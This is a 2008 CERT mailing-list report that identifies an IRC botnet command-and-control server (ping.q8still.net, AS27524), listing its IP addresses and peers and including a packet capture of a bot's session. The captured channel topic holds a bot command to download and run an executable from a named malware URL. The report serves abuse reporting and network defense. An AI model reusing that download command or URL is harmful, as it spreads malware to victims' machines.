[nsp-sec] botnet c&c: ping.q8still.net, AS27524
Marius Urkis
marius at litnet.lt
Mon Oct 13 05:33:48 EDT 2008
Hello,
There is a botnet controller on ping.q8still.net:6667
ping.q8still.net A 69.42.215.158
ping.q8still.net A 69.42.215.174
ping.q8still.net A 69.42.215.180
ping.q8still.net A 69.42.215.184
ping.q8still.net A 69.42.215.152
Server IP: 69.42.215.184
Server Port: 6667
Server AS: AS | IP | AS Name
Server AS: 27524 | 69.42.215.184 | XEEX-COMMUNICATIONS - Xeex
Peer AS : PEER_AS | IP | AS Name
Peer AS : 2516 | 69.42.215.184 | KDDI KDDI CORPORATION
Peer AS : 3561 | 69.42.215.184 | SAVVIS - Savvis
Peer AS : 4565 | 69.42.215.184 | MEGAPATH2-US - MegaPath Networks Inc.
Peer AS : 7132 | 69.42.215.184 | SBIS-AS - AT&T Internet Services
Peer AS : 7473 | 69.42.215.184 | SINGTEL-AS-AP Singapore Telecom
Peer AS : 10026 | 69.42.215.184 | ANC Asia Netcom Corporation
Peer AS : 11164 | 69.42.215.184 | TRANSITRAIL - National LambdaRail, LLC
T 193.219.a.b:2308 -> 69.42.215.184:6667 [AP]
USER wjufsk "" "wrd" :wjufsk..
T 69.42.215.184:6667 -> 193.219.a.b:2308 [AP]
.foonet.com 254 bhushq 4 :channels formed..:irc.foonet.com 255 bhushq
:I have 923 clients and 0 servers..:irc.foonet.com 265 bhushq :Current
Local Users: 923 Max: 930..:irc.foonet.com 266 bhushq :Current Global
Users: 923 Max: 930..:irc.foonet.com 422 bhushq :MOTD File is missing
..:bhushq MODE bhushq :+iwx..
T 193.219.a.b:2308 -> 69.42.215.184:6667 [AP]
JOIN #rape# fucker..
T 69.42.215.184:6667 -> 193.219.a.b:2308 [AP]
:bhushq!wjufsk@F8A0C8E.F9D84B24.178A27CD.IP JOIN
:#rape#..:irc.foonet.com 332 bhushq #rape# :. download http://www
.freewebtown.com/jakxx/is162866.exe c:\is162866.exe 1..:irc.foonet.com
333 bhushq #rape# ladlkad 23882478..:irc.foonet.com 353 bhushq @ #rape#
:bhushq ..:irc.foonet.com 366 bhushq #rape# :End of /NAMES list...
--
Marius
=============================
Marius Urkis
LITNET CERT
http://cert.litnet.lt
Tel: +370 37 300645
GSM: +370 687 79059